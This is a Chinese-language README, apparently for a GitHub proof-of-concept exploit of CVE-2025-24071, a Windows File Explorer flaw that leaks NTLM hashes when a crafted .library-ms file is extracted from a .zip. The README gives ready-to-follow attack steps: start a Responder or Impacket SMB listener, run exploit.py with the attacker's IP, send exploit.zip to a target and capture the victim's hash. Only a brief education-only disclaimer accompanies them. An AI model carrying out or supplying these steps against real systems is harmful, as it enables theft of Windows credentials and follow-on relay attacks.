CVE-2025-24071 是 Windows 文件资源管理器 中的一个漏洞,允许未经授权泄露 NTLM 哈希。当用户解压一个包含恶意 .library-ms 文件的特制 .zip 归档时,Windows 资源管理器会自动解析该文件,并向攻击者控制的服务器发起 SMB 身份验证请求,无需任何额外用户交互即可泄露受害者的 NTLM 哈希。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2025-24071 |
| 类型 | NTLM 哈希泄露 / 信息泄露 |
| 攻击向量 | 本地(需要用户解压 ZIP) |
| 用户交互 | 最低(仅需解压归档) |
| 影响 | NTLM 凭据窃取,潜在的中继攻击 |
.library-ms 文件.zip 归档.library-ms 文件https://github.com/user-attachments/assets/e71ea7f7-c739-46f1-9e91-1f3b13b21596
注意: 如果视频无法内联播放,请从此仓库下载
PoC.mp4。
smbserver.py)克隆仓库
git clone https://github.com/yourusername/CVE-2025-24071.git
cd CVE-2025-24071
启动 SMB 监听器(在攻击者机器上)
# Using Responder
sudo responder -I eth0
# Or using Impacket
sudo python3 smbserver.py -smb2support fakeShare /tmp/share
生成漏洞利用文件
python exploit.py
根据提示输入攻击者 IP 地址
将 exploit.zip 发送 给目标
当受害者解压归档时捕获 NTLM 哈希
CVE-2025-24071/
├── exploit.py # PoC 漏洞利用生成器
├── PoC.mp4 # 视频演示
└── README.md # 文档
此工具仅用于 教育和授权的安全测试目的。未经授权访问计算机系统是违法的。作者不对使用此工具造成的任何滥用或损害负责。
Nyx0r-PoC
本项目仅供教育目的使用。请负责任地使用。
⭐ 如果您觉得本仓库有用,请给它点个星!